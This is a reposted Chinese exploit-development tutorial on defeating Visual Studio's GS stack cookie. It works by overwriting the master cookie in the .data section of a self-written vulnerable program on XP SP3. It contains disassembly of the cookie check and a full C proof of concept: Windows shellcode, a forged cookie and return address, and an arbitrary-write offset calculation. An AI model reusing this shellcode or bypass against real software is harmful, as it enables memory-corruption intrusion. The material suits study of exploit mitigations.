生活随笔
收集整理的這篇文章主要介紹了
替换.DATA的COOKIE突破GS
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
首先 ? 如果想直接覆蓋 ?一場回調函數去劫持EXE的話 ,SafeSEH會阻止程序去執行;
SafeSEH的原理很簡單,就是對要調用的異常回調函數進行一系列對的有效性校驗 ? ?需要 操作系統XP SP2 及后續版本 和編譯器的雙重支持
下面說明GS的突破
?但感覺還是有點困難: ? ?1 ?要么程序寫了虛函數 ? 2要么程序主動去修改 COOKIE的值· ?3 最好的方法直接覆蓋 SEH ?典型SEH ?溢出即可
···感覺不會再愛了
?加了GS后 ?取的COOKIE:
00401000 55 push ebp
00401001 8BEC mov ebp,esp
00401003 81EC E4000000 sub esp,0xE4
00401009 A1 00304000 mov eax,dword ptr ds:[0x403000]
//取.data段數據 下面于 ebp 相xor 得到 cookie
0040100E 33C5 xor eax,ebp
00401010 8945 FC mov dword ptr ss:[ebp-0x4],eax
00401013 817D 0C 9599000>cmp dword ptr ss:[ebp+0xC],0x9995
0040101A 0F8D AA000000 jge vs2005TE.004010CA
開始時將 0x403000 處取出COKIE值,然后與EBP做一次異或放入 EBP-4的位置作為 此函數的Security Cookie
函數返回前的校驗就是此過程的逆過程,程序將
1 ? EBP-4的位置取出值,
2 ?然后與EBP異或
3 ?最后于 0x00403000處的COOKIE相比較
源碼為:
/*
XP SP3
VS2008 GS保護 禁止優化
*/
#include <stdafx.h>
#include <windows.h>char shellcode[]="\x90\x90\x90\x90""\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53"
"\x68\x64\x61\x30\x23"
"\x68\x23\x50\x61\x6E"
"\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8"//168"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"//注意這里 盡量將90放在后面 放在前面有問題!!!
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90"
"\xf4\x6f\x82\x90" //cookie 90826FF4 倒敘 我是通過 編碼直接得到 是單個字節xor
"\x90\x90\x90\x90" //ebp 原來是 0012ff64
"\x94\xFE\x12\x00" //0012FE94 為返回地址
;void test(char * S,int i,char * src)
{char dest[200];if (i<0x9995){char * buf = S+i;*buf = *src;*(buf+1) = *(src+1);*(buf+2) = *(src+2);*(buf+3) = *(src+3);strcpy(dest,src);}
}int main()
{char * str = (char *)malloc(0x10000);test(str,0xFFFF2FB8,shellcode);//.data 0x403000//malloc 0x410048 相減 D048 //FFFFFFFF - D048 + 1= FFFF2FB8
}
最后成功:
總結
以上是生活随笔為你收集整理的替换.DATA的COOKIE突破GS的全部內容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。
